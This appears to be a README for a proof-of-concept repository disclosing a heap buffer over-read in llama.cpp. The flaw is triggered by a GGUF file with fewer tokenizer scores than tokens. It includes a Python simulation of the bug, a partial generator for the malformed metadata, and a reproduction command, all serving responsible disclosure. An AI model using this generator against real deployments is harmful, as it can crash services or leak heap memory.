# llama-cpp-scores-oob-poc

## Heap Buffer Over-Read via Mismatched Tokenizer Array Lengths in GGUF
This repository contains a proof-of-concept (PoC) demonstrating a heap buffer over-read vulnerability in llama.cpp caused by mismatched tokenizer array lengths in a crafted GGUF model file.
## Vulnerability Summary
When loading a GGUF model, llama.cpp reads tokenizer metadata arrays (such as token scores and token types) and assumes their lengths match the vocabulary size. A specially crafted GGUF file can provide arrays with fewer elements than the declared vocabulary size, causing llama.cpp to read beyond the bounds of the allocated heap buffer when accessing token scores.
This results in a heap buffer over-read, which may lead to information disclosure or a crash.
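The flawed assumption can be illustrated with a short Python simulation (the names `n_vocab`, `scores`, and `get_score` are illustrative, not llama.cpp's actual symbols):

```python
# Illustrative simulation of the loader's assumption that the scores
# array is as long as the declared vocabulary.
n_vocab = 8          # vocabulary size declared in the GGUF metadata
scores = [0.0] * 4   # crafted file supplies only 4 score entries

def get_score(token_id: int) -> float:
    # In C++, indexing with token_id >= len(scores) reads past the end
    # of the heap allocation instead of raising an error.
    return scores[token_id]

try:
    get_score(6)     # token id valid for n_vocab, but not for scores
except IndexError:
    print("Python raises IndexError; C++ silently over-reads the heap")
```

Python bounds-checks the access and raises; in C++ the same index arithmetic walks off the end of the allocation, which is exactly the over-read the PoC triggers.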
## Files

| File | Description |
|---|---|
| `poc_scores_oob.gguf` | Crafted GGUF model file that triggers the vulnerability |
| `poc_scores_oob.py` | Python script used to generate the malicious GGUF file |
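The generator script itself is not reproduced here, but the core trick — emitting a `tokenizer.ggml.tokens` array longer than the `tokenizer.ggml.scores` array — can be sketched with nothing but the standard `struct` module. Key names and type ids follow the GGUF specification; this sketch writes only the tokenizer metadata, so a real PoC file would need additional keys (such as the model architecture) before llama.cpp would load it:

```python
import struct

GGUF_MAGIC = b"GGUF"
GGUF_VERSION = 3
# GGUF metadata value type ids (from the GGUF spec)
T_FLOAT32, T_STRING, T_ARRAY = 6, 8, 9

def gguf_string(s: str) -> bytes:
    """GGUF string: uint64 length prefix + UTF-8 bytes."""
    data = s.encode("utf-8")
    return struct.pack("<Q", len(data)) + data

def kv_string(key: str, value: str) -> bytes:
    return gguf_string(key) + struct.pack("<I", T_STRING) + gguf_string(value)

def kv_array(key: str, elem_type: int, packed_elems: bytes, count: int) -> bytes:
    return (gguf_string(key) + struct.pack("<I", T_ARRAY)
            + struct.pack("<IQ", elem_type, count) + packed_elems)

def build_poc(n_vocab: int = 8, n_scores: int = 4) -> bytes:
    """Build minimal GGUF metadata with fewer scores than tokens."""
    tokens = b"".join(gguf_string(f"tok{i}") for i in range(n_vocab))
    scores = b"".join(struct.pack("<f", 0.0) for _ in range(n_scores))
    kvs = [
        kv_string("tokenizer.ggml.model", "llama"),
        kv_array("tokenizer.ggml.tokens", T_STRING, tokens, n_vocab),
        # Fewer scores than tokens: the loader indexes scores by token id.
        kv_array("tokenizer.ggml.scores", T_FLOAT32, scores, n_scores),
    ]
    # Header: magic, version, tensor_count (0), metadata kv count
    header = GGUF_MAGIC + struct.pack("<IQQ", GGUF_VERSION, 0, len(kvs))
    return header + b"".join(kvs)
```

In practice the actual script more likely uses the `gguf` Python package shipped with llama.cpp; the raw-bytes version above just makes the length mismatch explicit.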
## Reproduction

```sh
# Build llama.cpp, then run with the crafted model:
./llama-cli -m poc_scores_oob.gguf -p "test"
```
## Disclaimer
This PoC is provided for security research and responsible disclosure purposes only. Do not use it for malicious purposes.